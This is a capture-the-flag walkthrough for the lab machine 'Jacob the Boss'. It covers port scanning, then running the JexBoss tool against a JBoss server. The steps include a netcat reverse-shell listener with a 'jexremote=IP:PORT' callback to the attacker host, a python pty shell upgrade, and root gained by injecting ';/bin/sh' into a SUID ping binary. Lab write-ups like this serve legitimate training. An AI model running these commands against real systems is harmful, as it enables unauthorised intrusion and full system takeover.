Jacob the Boss
Introduction
Well, the flaw that makes up this box is the reproduction found in the production environment of a customer a while ago, the verification in season consisted of two steps, the last one within the environment, we hit it head-on and more than 15 machines were vulnerable that together with the development team we were able to correct and adapt.
*First of all, add the jacobtheboss.box address to your hosts file.
Anyway, learn a little more, have fun!
We Will Add jacobtheboss.box to the /etc/hosts file.
sudo nano /etc/hosts
IP Address jacobtheboss.box
Enumeration
We always start scanning our IP to find open ports with NMAP.
The ones who grabs attention is the port 80 (Dotclear) and 8080 (JBoss).
Exploitation
USER.TXT
As soon as I saw the JBoss I knew it was the target because of the box named as Jacob the Boss.
Typing jboss exploitation on google we find a github project which we will use to our exploitation.
We will install the project using the command:
git clone project git link
To install the requirent dependencies we will run:
pip install -r requires.txt
And to run the exploit we do:
python jexboss.py -host http://jacobtheboss.box:8080/
When we get a shell we open a listener in our Kali Attacker Machine:
nc -nlvp PORT
Thank on the exploit shell we run:
jexremote=IP:PORT
Which will give us a non-interactive shell and to upgrade we run:
python -c 'import pty; pty.spawn("/bin/bash")'
After that we can print our first flag:
cat /home/jacob/user.txt
ROOT.TXT
It is time to upgrade our user jacob to root privileges.
To do so we will look for SUID files running as root to see if we find anything interesting that could escalate our privileges.
The command we use:
find / -perm -u=s 2>/dev/null
The interesting file we find is /usr/bin/pingsys
Now we run the command to escalate our privileges:
/usr/bin/pingsys '127.0.0.1;/bin/sh'
And boom we become root!
